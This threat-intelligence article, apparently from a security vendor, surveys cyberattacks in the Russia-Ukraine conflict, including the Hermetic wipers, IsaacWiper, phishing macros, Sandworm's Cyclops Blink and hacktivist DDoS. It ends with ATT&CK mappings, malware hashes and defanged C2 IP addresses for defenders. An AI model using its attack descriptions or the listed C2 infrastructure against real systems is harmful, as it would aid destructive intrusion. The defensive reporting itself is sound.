Cyble-Ongoing-Warfare

Ongoing Cyberwarfare: A Look at the Key Cyberattacks

With geopolitical tensions at an all-time high, the ongoing crisis has spawned a series of targeted cyberattacks between the two countries and the rest of the world. Security researchers at Cyble Research Labs have compiled a list of critical incidents in the escalating Russia-Ukraine conflict. Following are some of the emerging cyber threats affecting both nations.

Hermetic Malware

In a joint advisory, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation warned organizations about two destructive malware types attacking Ukrainian organizations. The first one, WhisperGate Wiper, was identified by Microsoft in January of 2022. Refer to Cyble Research Lab’s analysis of the malware for more details. In February, researchers at ESET, a Slovakia-based internet security company, found a new wiper malware variant going by the names HermeticWizard, HermeticWiper, and HermeticRansom. The Hermetic malware family was discovered shortly after Russia attacked Ukraine on February 24, 2022. The digital certificate used by the malware is issued to Hermetica Digital Limited, as shown below in Figure1.

Figure 1: Digital Certificate

HermeticWizard

HermeticWizard is a dropper containing three different files embedded into its resource section. The first embedded file is the HermeticWiper executable. The remaining two are Dynamic Link Library (DLL) files used for spreading the wiper malware. The HermeticWizard malware strain spreads with the help of Windows Management Instrumentation (WMI) and Server Message Block (SMB) and is executed with the help of rundll32.exe/regsvr32.exe. The malware drops and runs the HermeticWiper on the victim machine upon successful infection.

HermeticWiper

The main objective of HermeticWiper is to make the victim system inaccessible by overwriting the Master Boot Record (MBR). Our analysis showed that the HermeticWiper has compressed driver files embedded in the resource section.

Figure 2: Embedded Drivers in the Resource

Based on the Operating System version, one of the above drivers is decompressed and installed in the machine by the malware before the system reboots. The driver is then deployed in the compromised machine to interact with the file system without using Windows API and successfully corrupting the physical drive. In this attack, the attackers were seen to be abusing a benign driver file, empntdrv.sys

Finally, the malware enumerates the physical drive from 0-100 and corrupts the MBR for every physical drive it encounters. The figure below shows the boot manager screen after corrupting the MBR.

Figure 3: Error Message for the Windows Boot Manager Failure

HermeticRansom

HermeticRansom is written in the Go Language, and it has been reported that the HermeticRansom and HermeticWiper campaigns commenced in Ukraine at about the same time. Researchers at ESET mentioned that the HermeticRansom is used to hide the execution of the HermeticWiper in the targeted system. Upon successful execution, the ransom note shown below is displayed to victims.

Figure 4: Ransom Note (Source:welivesecurity )

IsaacWiper

IsaacWiper is another wiper malware observed in the Ukrainian government network that wipes out the MBR. It can either be a DLL or an EXE file dropped and executed in the %programdata% or system32 location. The IsaacWiper file was compiled on October 19, 2021, indicating that the malware may have been used in earlier attacks. Similar to the HermeticWiper, the IssacWiper enumerates the physical drive and wipes out the MBR to make the system inaccessible.

Mass Phishing Attacks

On February 25, 2022, the Twitter account, State Service Communications and Information Protection of Ukraine (SSSCIP) warned of a mass phishing attack targeting Ukrainians through emails containing attachments of uncertain nature. A screenshot of the Phishing email was also shared by the SSSCIP, as shown in Figure 5.

Figure 5: SSSCIP statement on Twitter

In another event, the CERT-UA shared a Facebook post informing about mass phishing emails targeting the private accounts of Ukrainian military personnel and related individuals.

The phishing emails were observed to contain a macro-embedded malicious excel file in the attachment. Upon execution, the macro code downloads a MSI package from the command-and-control (C2) server and executes it. The final MSI installer payload exfiltrates system data to the C2 server and executes commands received from the C2 server.

Sandworm APT

In addition to the disruptive cyberattacks against organizations in Ukraine, the country’s cyber operations are also being targeted by the Russian Advanced Persistent Threat (APT) group, Sandworm. The group has been active since May 2017 and can be attributed to Russia’s General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.

The Sandworm APT group has been using the VPNFilter framework to carry out operations against the Ukrainian targets. This framework exploits network devices, primarily small office/home office (SOHO) routers and network-attached storage (NAS) devices.

In a recent advisory, CISA warned about a new malware named Cyclops Blink added to the arsenal by the Sandworm APT group. It leverages a modular malware framework for targeting network devices. Though the primary target of the Cyclops Blink has been WatchGuard Devices, we believe that the Sandworm group has the ability to compile the malware for targeting other devices as well.

DDoS Attacks on Russian State and Private Websites

Researchers at Cyble identified a website offering a range of tools and techniques to perform DDoS attacks against Russian websites. The website appears to be driven by the ongoing geopolitical tension and also encourages mass reporting of pro-Russian social media accounts.  

The website provides python scripts to perform DDoS attacks on target websites using Windows, Linux, and MacOS platforms. Users can modify the script to change the targets, thereby enabling these scripts to be used against other targets in the future. Figure 6 shows the homepage of the website.

Figure 6: Website Providing Tools for DDoS Attacks in Russia

Amid the intensifying tensions, another hacktivist group named GhostSec (Ghost Security), declared its support to Ukraine and announced that it had flooded Russian military websites with DDoS attacks.

Figure 7: GhostSec Declaration of DDoS

Industrial Control Systems Attacks

The Industrial Control Systems (ICS) of both Russia and Ukraine are being heavily targeted by cyberattacks, as each country attempts to cripple the industrial cyberinfrastructure of the other.

Supervisory Control and Data Acquisition (SCADA) is the largest subgroup of ICS. SCADA systems are the central systems that help in monitoring and operating plant operations. A single successful cyberattack on SCADA can bring operations of the plant to a standstill. As SCADA is mostly deployed inside industrial environments, a malfunction in this system can also result in tremendous damage, ranging from the loss of life to physical damage to the plant.

On March 2, the hacktivist group, Anonymous, claimed to have compromised the Dubna Bypass Module to gain access to the monitoring system of a nuclear reactor managed by the Joint Institute for Nuclear Research (JINR) Russia.

Figure 8: Image Shared by Anonymous Group

Conclusion

There is little doubt that sophisticated cyber weapons are key tools in the arsenal of a modern military. Nation-states and sympathetic hacktivists are targeting government assets, critical infrastructure, and private sector organizations. Operational technologies, Banking, financial services and insurance (BFSI), and media sectors are highly lucrative targets for attackers. With Russia and Ukraine being targeted by a barrage of cyberattacks, it has become even more evident that targeted cyber warfare will only continue to be deployed as the global tensions continue to intensify.

Our researchers are continuously gathering more information on the latest cyberattacks, and we will keep updating this space as and when we have more information.

MITRE ATT&CK® Techniques

TacticTechnique ID    Technique Name
Resource DevelopmentT1588.002
T1588.003
Obtain Capabilities: Tool
Obtain Capabilities: Code Signing Certificates
Initial AccessT1078.002
T1059.003
Valid Accounts: Domain Accounts
Command and Scripting Interpreter: Windows Command
ExecutionT1106
T1569.002
T1047
Native API
System Services: Service Execution
Windows Management Instrumentation
DiscoveryT1018Remote System Discovery
Lateral MovementT1021.002
T1021.003
Remote Services: SMB/Windows Admin Shares
Remote Services: Distributed Component Object Model
ImpactT1561.002
T1561.001
T1485
T1499.002
Disk Wipe: Disk Structure Wipe
Disk Wipe: Disk Content Wipe
Data Destruction
Endpoint Denial of Service: Service Exhaustion Flood

Indicators Of Compromise (IOCs)

Indicators                                                Indicator type Description
84ba0197920fd3e2b7dfa719fee09d2f
912342f1c840a42f6b74132f8a7c4ffe7d40fb77 0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da
MD5
SHA1
SHA256  
HermeticWiper
382fc1a3c5225fceb672eea13f572a38
d9a3596af0463797df4ff25b7999184946e3bfa2 2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf
MD5
SHA1
SHA256  
HermeticWiper
decc2726599edcae8d1d1d0ca99d83a6
0d8cc992f279ec45e8b8dfd05a700ff1f0437f29 3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767
MD5
SHA1
SHA256  
HermeticWiper
3f4a16b29f2f0532b7ce3e7656799125
61b25d11392172e587d8da3045812a66c3385451 1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591
MD5
SHA1
SHA256
HermeticWiper
5d1122d01501e65a718e565178b301a8
5ba988916d175d5887fb200b8c15a7e76e1fbd20 4aa186b5fdcc8248a9672bf21241f77dd395872ec4876c90af5d27ae565e4cb7
MD5
SHA1
SHA256
HermeticWiper
f1a33b2be4c6215a1c39b45e391a3e85
9518e4ae0862ae871cf9fb634b50b07c66a2c379 06086c1da4590dcc7f1e10a6be3431e1166286a9e7761f2de9de79d7fda9c397
MD5
SHA1
SHA256
HermeticWiper
D5d2c4ac6c724cd63b69ca054713e278
F32d791ec9e6385a91b45942c230f52aff1626df 4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382
MD5
SHA1
SHA256
HermeticRansom
ecce8845921a91854ab34bff2623151e
736a4cfad1ed83a6a0b75b0474d5e01a3a36f950 13037b749aa4b1eda538fda26d6ac41c8f7b1d02d83f47b0d187dd645154e033
MD5
SHA1
SHA256
IsaacWiper
6c10466ad7c153e7f949fa3c6600b6ac
5d009f79383a81622eefd8b183efb23fbf96a62f 7bcd4ec18fc4a56db30e0aaebd44e2988f98f7b5d8c14f6689f650b4f11e16c0
MD5
SHA1
SHA256
IsaacWiper
6983f7001de10f4d19fc2d794c3eb534
23873bf2670cf64c2440058130548d4e4da412dd 3c2fe308c0a563e06263bbacf793bbe9b2259d795fcc36b953793a7e499e7f71
MD5
SHA1
SHA256
RemCom remote access tool
100.43.220[.]234IPv4 addressSandworm C2 server IP address
96.80.68[.]193IPv4 addressSandworm C2 server IP address
188.152.254[.]170IPv4 addressSandworm C2 server IP address
208.81.37[.]50IPv4 addressSandworm C2 server IP address
70.62.153[.]174IPv4 addressSandworm C2 server IP address
2.230.110[.]137IPv4 addressSandworm C2 server IP address
90.63.245[.]175IPv4 addressSandworm C2 server IP address
212.103.208[.]182IPv4 addressSandworm C2 server IP address
50.255.126[.]65IPv4 addressSandworm C2 server IP address
78.134.89[.]167IPv4 addressSandworm C2 server IP address
81.4.177[.]118IPv4 addressSandworm C2 server IP address
24.199.247[.]222IPv4 addressSandworm C2 server IP address
37.99.163[.]162IPv4 addressSandworm C2 server IP address
37.71.147[.]186IPv4 addressSandworm C2 server IP address
105.159.248[.]137IPv4 addressSandworm C2 server IP address
80.155.38[.]210IPv4 addressSandworm C2 server IP address
217.57.80[.]18IPv4 addressSandworm C2 server IP address
151.0.169[.]250IPv4 addressSandworm C2 server IP address
212.202.147[.]10IPv4 addressSandworm C2 server IP address
212.234.179[.]113IPv4 addressSandworm C2 server IP address
185.82.169[.]99IPv4 addressSandworm C2 server IP address
93.51.177[.]66IPv4 addressSandworm C2 server IP address
80.15.113[.]188IPv4 addressSandworm C2 server IP address
80.153.75[.]103IPv4 addressSandworm C2 server IP address
109.192.30[.]125IPv4 addressSandworm C2 server IP address

Our Recommendations

  • Keep the operating system and installed software in the system and server updated.
  • Minimize network exposure for all serial devices using network segmentation and the placement of serial devices behind network firewalls to ensure that they are not accessible via the Internet.
  • Conduct regular backup practices and maintain backups offline or in a separate network.
  • Use security solutions available for Linux and IoT devices.
  • Refrain from opening untrusted links and email attachments without verifying their authenticity.
  • Create and save your passwords with password managers.
  • Change all internet-connected devices’ default passwords.
Scroll to Top